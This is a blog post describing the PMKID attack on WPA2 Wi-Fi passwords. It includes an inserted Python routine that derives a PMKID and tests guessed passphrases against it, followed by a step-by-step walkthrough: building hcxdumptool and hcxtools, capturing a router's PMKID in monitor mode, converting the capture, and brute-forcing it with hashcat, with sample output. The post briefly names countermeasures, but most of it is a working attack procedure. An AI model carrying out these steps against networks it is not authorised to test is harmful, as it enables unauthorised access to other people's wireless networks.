WPA2 is broken again! A security researcher has found a new method to crack the WPA standard and obtain the password.

It was discovered by Jens Atom, a lead developer of hashcat. It was purely accidental: he was actually analyzing the newly launched WPA3 protocol.

Usually a Wi-Fi network is attacked by exploiting the WPS feature or by capturing the EAPOL 4-way handshake from a client, so the attacker has to wait for a client to log in. In this new method the attacker doesn't need a client or a handshake.

Here the attacker obtains the Pairwise Master Key Identifier (PMKID) from a WPA/WPA2-secured router and cracks the PSK offline. The PMKID is computed using HMAC-SHA1, where the key is the PMK and the data is the concatenation of the fixed string label "PMK Name", the access point's MAC address and the station's MAC address.
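To see exactly what the captured value is, here is an added Python example (not from the original post, hashcat or the hcxtools project) that derives the PMKID from a passphrase exactly as stated above, writes it out in the line layout hcxpcaptool -z produces, and checks whether a passphrase reproduces it. The SSID and passphrase are constructed; the MAC addresses are the ones shown in the capture output further down. It makes the defensive point concrete: everything in the computation except the passphrase is public, so a captured PMKID is an offline-verifiable hash whose strength rests on passphrase entropy alone.

```python
import hashlib
import hmac

# Constructed sample values (not a real network). The MACs are the AP and
# client addresses that appear in the hcxdumptool output on this page.
SSID = "ExampleNet"
PASSPHRASE = "correct horse battery"
AP_MAC = bytes.fromhex("4604ba734d4e")
STA_MAC = bytes.fromhex("89acf0e761f4")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC)."""
    data = b"PMK Name" + ap_mac + sta_mac
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def to_16800_line(pmkid_bytes: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Lay the values out as hcxpcaptool -z does: PMKID*APMAC*STAMAC*ESSID(hex)."""
    return "*".join([pmkid_bytes.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def passphrase_reproduces(line: str, passphrase: str) -> bool:
    """Does this passphrase yield the PMKID in a 16800 line?

    This is the per-guess computation hashcat repeats: the SSID and both MACs
    are read from the line itself, only the passphrase is unknown.
    """
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.split("*")
    pmk = pmk_from_passphrase(passphrase, bytes.fromhex(ssid_hex).decode())
    got = pmkid(pmk, bytes.fromhex(ap_hex), bytes.fromhex(sta_hex))
    return hmac.compare_digest(got, bytes.fromhex(pmkid_hex))


def sample_line() -> str:
    """The 16800 line the capture would yield for the constructed network above."""
    pmk = pmk_from_passphrase(PASSPHRASE, SSID)
    return to_16800_line(pmkid(pmk, AP_MAC, STA_MAC), AP_MAC, STA_MAC, SSID)


if __name__ == "__main__":
    line = sample_line()
    print(line)
    # Verifying your own network's passphrase against its PMKID line.
    print("passphrase reproduces PMKID:", passphrase_reproduces(line, PASSPHRASE))
```

Because the PMKID depends only on the passphrase, SSID and two MAC addresses, the WPA2-level countermeasure is a long random passphrase (or disabling PMKID caching on the AP, or moving to WPA3 where this derivation is not exposed).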


How to capture PMKID

In order to make use of this new attack you need the following tools.

Download and install the tools:

hcxdumptool

git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install

hcxtools

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install

Step-1 : Put your Wi-Fi interface into monitor mode

airmon-ng start wlan0

Step-2 : Start the packet capture

hcxdumptool -o test.pcapng -i wlan0mon --enable_status=3

Output:

start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

If an AP receives our association request packet and supports sending the PMKID, we will see the message "FOUND PMKID" after a moment:

[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Step-3 : Convert the capture to hash format

hcxpcaptool -z test.16800 test.pcapng

Output:

start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

Step-4 : Crack the hash using hashcat

Now we have our hash in the test.16800 file. Feed it to hashcat to recover the password.

Brute-force mode:

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?l?l?l?l'

You can also use a dictionary or other attack modes depending on the difficulty of the target.


Susmith Krishnan

I'm a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16, and I would like to explore security vulnerabilities and the latest tech news and want to share them with you.
